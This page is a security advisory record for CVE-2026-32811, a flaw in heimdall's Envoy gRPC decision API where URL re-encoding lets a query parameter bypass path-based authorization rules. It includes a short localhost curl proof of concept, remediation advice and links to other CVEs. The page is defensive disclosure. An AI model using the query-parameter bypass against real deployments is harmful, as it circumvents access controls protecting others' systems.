Docker
CVE-2026-32811
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
When using heimdall in envoy gRPC decision API mode, wrong encoding of the query URL string allows rules with non-wildcard path expressions to be bypassed.
The HTTP based decision API is NOT affected, and proxy mode is NOT affected either.
Note: The issue can only lead to unintended access if heimdall is configured with an "allow all" default rule. Since v0.16.0, heimdall enforces secure defaults and refuses to start with such a configuration unless this enforcement is explicitly disabled, e.g. via --insecure-skip-secure-default-rule-enforcement or the broader --insecure flag.
Details
Envoy splits the requested URL into parts, and sends the parts individually to heimdall. Although query and path are present in the API, the query field is documented to be always empty and the URL query is included in the path field [1].
The implementation uses go's url library to reconstruct the url which automatically encodes special characters in the path.
https://github.com/dadrus/heimdall/blob/1faba9e4160bd7ab3240cf6aa418e21bfef3401a/internal/handler/envoyextauth/grpcv3/request_context.go#L109-L115
As a consequence, a parameter like /mypath?foo=bar to Path is escaped into /mypath%3Ffoo=bar. Subsequently, a rule matching /mypath no longer matches and is bypassed.
PoC
Using the example docker compose setup, the demo:public rule is bypassed when adding a query parameter.
> docker compose -f docker-compose-envoy-grpc.yaml -f docker-compose.yaml up
curl http://127.0.0.1:9090/public
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.3
RemoteAddr: 172.23.0.5:37056
GET /public HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 0a1f0f06-75ef-4f14-92af-16162ea1d9e5
curl -v http://127.0.0.1:9090/public?bypass
* Trying 127.0.0.1:9090...
* Established connection to 127.0.0.1 (127.0.0.1 port 9090) from 127.0.0.1 port 47876
* using HTTP/1.x
> GET /public?hallo HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/8.19.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 401 Unauthorized
< date: Sat, 14 Mar 2026 16:34:17 GMT
< server: envoy
< content-length: 0
<
* Connection #0 to host 127.0.0.1:9090 left intactWhen using the HTTP decision API variant, the second request is matched by the rule as well:
> docker compose -f docker-compose-envoy-http.yaml -f docker-compose.yaml up
curl http://127.0.0.1:9090/public?bypass
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.4
RemoteAddr: 172.23.0.2:38044
GET /public?hallo HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 5c961bc6-ad03-4a44-982b-abe04566fdd2Impact
Everyone using heimdall with the envoy gRPC API may be affected. Users who configured a deny list in heimdall (with an allow-all default rule) are affected, as attackers can potentially circumvent a specific block rule by adding query parameters.
[1] https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147
AnalysisAI
Heimdall, an authorization decision API for Envoy proxy, contains a path traversal bypass vulnerability when used in gRPC decision API mode. Attackers can bypass non-wildcard path expression rules by appending query parameters to URLs, which causes incorrect URL encoding that prevents rule matching. A proof-of-concept is publicly available demonstrating the bypass, though exploitation requires heimdall to be configured with an insecure 'allow all' default rule (which is blocked by secure defaults since v0.16.0 unless explicitly disabled).
Technical ContextAI
This vulnerability affects the heimdall Go package (pkg:go/github.com_dadrus_heimdall) when integrated with Envoy's gRPC external authorization API (envoy.service.auth.v3). The root cause is CWE-116 (Improper Encoding or Escaping of Output). Envoy sends URL components separately with query parameters embedded in the path field, but heimdall's URL reconstruction using Go's url library automatically encodes special characters. This transforms '/mypath?foo=bar' into '/mypath%3Ffoo=bar', causing path-based authorization rules matching '/mypath' to fail. The HTTP decision API and proxy mode correctly handle URL encoding and are not affected.
RemediationAI
Apply the patch available in commit 50321b3007db1ccafdc6b1cfd6bdc3689c19a502 (https://github.com/dadrus/heimdall/commit/50321b3007db1ccafdc6b1cfd6bdc3689c19a502) and pull request #3106 (https://github.com/dadrus/heimdall/pull/3106). If immediate patching is not possible, ensure heimdall is configured with secure defaults by avoiding 'allow all' default rules and not using the --insecure-skip-secure-default-rule-enforcement or --insecure flags. Consider switching from gRPC decision API mode to HTTP decision API mode as a temporary workaround, as the HTTP variant is not affected by this encoding issue. Review authorization rules to ensure they follow a default-deny approach rather than deny-list patterns.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-116 – Improper Encoding or Escaping of Output
View allSame technique Authentication Bypass
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-r8x2-fhmf-6mxp